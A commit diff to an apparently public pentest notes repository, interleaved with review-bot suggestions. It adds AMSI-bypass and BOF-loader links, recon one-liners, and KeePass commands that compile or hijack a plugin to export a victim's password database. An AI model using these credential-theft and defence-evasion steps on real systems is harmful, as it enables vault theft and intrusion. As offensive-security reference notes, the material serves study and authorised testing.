Commit
[AHK] Automatic update 👽
snovvcrash committed Mar 17, 2023
1 parent b31c900 commit 984f80d
Showing 5 changed files with 48 additions and 7 deletions.
8 changes: 8 additions & 0 deletions pentest/infrastructure/ad/av-edr-evasion/README.md
Expand Up @@ -104,6 +104,14 @@ Note that we don't have to target the exact .NET Framework version when compilin



### BOFs with Python

- [https://github.com/rkbennett/pybof](https://github.com/rkbennett/pybof)
- [https://tishina.in/execution/python-inmemory-bof](https://tishina.in/execution/python-inmemory-bof)
- [https://github.com/zimnyaa/inmembof.py](https://github.com/zimnyaa/inmembof.py)




## Tools

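Review bot: the new `### BOFs with Python` subsection is a bare link list that gives no hint which entries are tools and which is the write-up (two GitHub repositories and one tishina.in post), so a reader has to open all three to tell them apart; a one-line gloss after each link, e.g. what each loader does and how they differ, would make the list usable on its own.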
8 changes: 1 addition & 7 deletions pentest/infrastructure/ad/av-edr-evasion/amsi-bypass.md
Expand Up @@ -16,6 +16,7 @@ description: Antimalware Scan Interface
* [https://ethicalchaos.dev/2022/04/17/in-process-patchless-amsi-bypass/](https://ethicalchaos.dev/2022/04/17/in-process-patchless-amsi-bypass/)
* [https://github.com/Mr-Un1k0d3r/AMSI-ETW-Patch](https://github.com/Mr-Un1k0d3r/AMSI-ETW-Patch)
* [https://www.blazeinfosec.com/post/tearing-amsi-with-3-bytes/](https://www.blazeinfosec.com/post/tearing-amsi-with-3-bytes/)
* [https://github.com/ZeroMemoryEx/Amsi-Killer/blob/master/README.md](https://github.com/ZeroMemoryEx/Amsi-Killer/blob/master/README.md)

AMSI Test [Sample](https://gist.github.com/rasta-mouse/5cdf25b7d3daca5536773fdf998f2f08):

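Review bot: the added reference links the `README.md` blob on the `master` branch rather than the repository root (`https://github.com/ZeroMemoryEx/Amsi-Killer`, which is the URL the `## Tools` section below carried until this commit); a blob path breaks if the file or default branch is renamed, and the repo root already renders the README. Suggest linking the repository itself, which also keeps the entry consistent with the other GitHub links in this list.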
Expand Down Expand Up @@ -327,10 +328,3 @@ try {
...
```
{% endcode %}




## Tools

- [https://github.com/ZeroMemoryEx/Amsi-Killer](https://github.com/ZeroMemoryEx/Amsi-Killer)
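Review bot: this hunk removes the whole `## Tools` section, so the page's only remaining pointer to Amsi-Killer is the reference-list entry added above; if the intent is to fold the tool into the references, carry the repo URL `https://github.com/ZeroMemoryEx/Amsi-Killer` over there rather than only the README blob. Also check that the file still ends with a newline after `{% endcode %}` now that the trailing blank lines are gone.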
21 changes: 21 additions & 0 deletions pentest/infrastructure/ad/credential-harvesting/keepass.md
Expand Up @@ -53,6 +53,27 @@ PS > (gc .\keepassxc_strings.txt).length / 1mb
- [https://github.com/d3lb3/KeeFarceReborn](https://github.com/d3lb3/KeeFarceReborn)


#### Abusing the KeePass Plugin Cache

- [https://blog.quarkslab.com/post-exploitation-abusing-the-keepass-plugin-cache.html](https://blog.quarkslab.com/post-exploitation-abusing-the-keepass-plugin-cache.html)
- [https://github.com/d3lb3/KeeFarceReborn/tree/main/KeeFarceRebornPlugin](https://github.com/d3lb3/KeeFarceReborn/tree/main/KeeFarceRebornPlugin)

Export DB by compiling and loading a malicious plugin (requires admin's privileges to place the `.plgx` file):

```
Cmd > KeePass.exe --plgx-create C:\KeeFarceReborn\KeeFarceRebornPlugin
Cmd > copy C:\KeeFarceReborn\KeeFarceRebornPlugin.plgx "C:\Program Files\KeePass Password Safe 2\Plugins"
```

Export DB by hijacking a legit plugin DLL (requires an existent plugin in use):

```
Cmd > copy "C:\Program Files\KeePass Password Safe 2\KeePass.exe" .
Cmd > devenv /build Release KeeFarceRebornPlugin.sln
Cmd > copy C:\KeeFarceReborn\KeeFarceRebornPlugin\bin\Release\KeeFarceRebornPlugin.dll C:\Users\snovvcrash\AppData\Local\KeePass\PluginCache\3o7A46QKgc2z6Yz1JH88\LegitPlugin.dll
```



### KeePassHax

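Review bot: the second command block hard-codes the author's own profile and plugin-cache directory (`C:\Users\snovvcrash\AppData\Local\KeePass\PluginCache\3o7A46QKgc2z6Yz1JH88\LegitPlugin.dll`); the cache folder name is specific to the plugin install and the username is not the reader's, so the line cannot be reused as written. Suggest `%LOCALAPPDATA%\KeePass\PluginCache\<cache-id>\<LegitPlugin>.dll` as placeholders. The same block copies `KeePass.exe` into the current directory and then builds a relative `KeeFarceRebornPlugin.sln`, while the final copy uses the absolute `C:\KeeFarceReborn\...` path, so state the working directory once. Minor: `requires admin's privileges` reads better as `requires administrative privileges`, and both fences lack the `{% code %}` wrapper used in amsi-bypass.md above.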
1 change: 1 addition & 0 deletions pentest/perimeter/1c.md
Expand Up @@ -4,6 +4,7 @@
- [https://habr.com/ru/post/352566/](https://habr.com/ru/post/352566/)
- [https://github.com/KraudSecurity/1C-Exploit-Kit](https://github.com/KraudSecurity/1C-Exploit-Kit)
- [https://www.rbsoft.ru/kb/upravlenie-spiskami-baz-1s/](https://www.rbsoft.ru/kb/upravlenie-spiskami-baz-1s/)
- [[PDF] Уязвимости и атаки на CMS Bitrix (by @crlf)](https://github.com/cr1f/writeups/blob/main/attacking_bitrix.pdf)

Desktop clients' DB config is stored in `C:\Users\<USERNAME>\AppData\Roaming\1C\1CEStart\ibases.v8i`:

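Review bot: the new entry is about CMS Bitrix (its title reads, in English, "Vulnerabilities and attacks on CMS Bitrix"), while the rest of this list and the `ibases.v8i` config path below concern the 1C:Enterprise desktop client; a reader scanning `1c.md` will not expect web CMS material here. Either put it under a short `1C-Bitrix` heading or move it to the web section. It is also the only item in the list whose link text is not the bare URL, so the list style is now mixed.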
17 changes: 17 additions & 0 deletions pentest/web/README.md
Expand Up @@ -184,6 +184,12 @@ $ nuclei -l domains.txt -t ssl -o nuclei-ssl.out
$ cat nuclei-ssl.out | grep -e deprecated-tls -e detect-ssl -e expired-ssl -e mismatched-ssl -e self-signed -e weak-cipher | sort -u
```

Using [tlsx](https://github.com/projectdiscovery/tlsx/releases):

```
$ das -db corp parse https -raw | tlsx -ex -ss -mm -re -o tlsx.out
```



### httpx
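Review bot: the `das -db corp parse https -raw | tlsx ...` line assumes the reader has `das` (DivideAndScan) with a database named `corp`, a prerequisite the nuclei example above does not have (it reads `domains.txt`); either state that prerequisite or add a `tlsx -l domains.txt ...` form so the two examples stay parallel. The short flags `-ex -ss -mm -re` also deserve a gloss (expired, self-signed, mismatched, revoked) so the line matches the explicit `grep -e deprecated-tls -e ... -e self-signed` filter above.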
Expand All @@ -193,3 +199,14 @@ $ cat nuclei-ssl.out | grep -e deprecated-tls -e detect-ssl -e expired-ssl -e mi
```
$ httpx -l domains.txt -vhost -http2 -pipeline -title -content-length -status-code -follow-redirects -tls-probe -content-type -location -csp-probe -web-server -stats -ip -cname -cdn -ports 80,81,300,443,591,593,832,981,1010,1311,2082,2087,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5800,6543,7000,7396,7474,8000,8001,8008,8014,8042,8069,8080,8081,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8443,8500,8834,8880,8888,8983,9000,9043,9060,9080,9090,9091,9200,9443,9800,9981,12443,16080,18091,18092,20720,28017 -threads 300 -o httpx.out
```



### katana

- [https://github.com/projectdiscovery/katana](https://github.com/projectdiscovery/katana/releases)
- [https://github.com/CristiVlad25/scripts/blob/master/kata.sh](https://github.com/CristiVlad25/scripts/blob/master/kata.sh)

```
$ katana -u https://megacorp.com/ -hl -nos -jc -silent -aff -kf all,robotstxt,sitemapxml -c 150 -fs fqdn | subjs | jsa.py | goverview probe -N -c 500 | sort -u -t';' -k2,14 | cut -d';' -f1
```
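Review bot: in the first katana reference the visible text is `https://github.com/projectdiscovery/katana` but the target is `.../katana/releases`; make the two match (the tlsx entry earlier in this file does). The pipeline also goes through `subjs`, `jsa.py` and `goverview` with no reference links, unlike `kata.sh`; add them so the one-liner can be reproduced. Minor: `sort -u -t';' -k2,14 | cut -d';' -f1` dedups on fields 2-14 of goverview's `;`-separated output, which is worth a comment naming those fields since the column layout is tool-specific.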
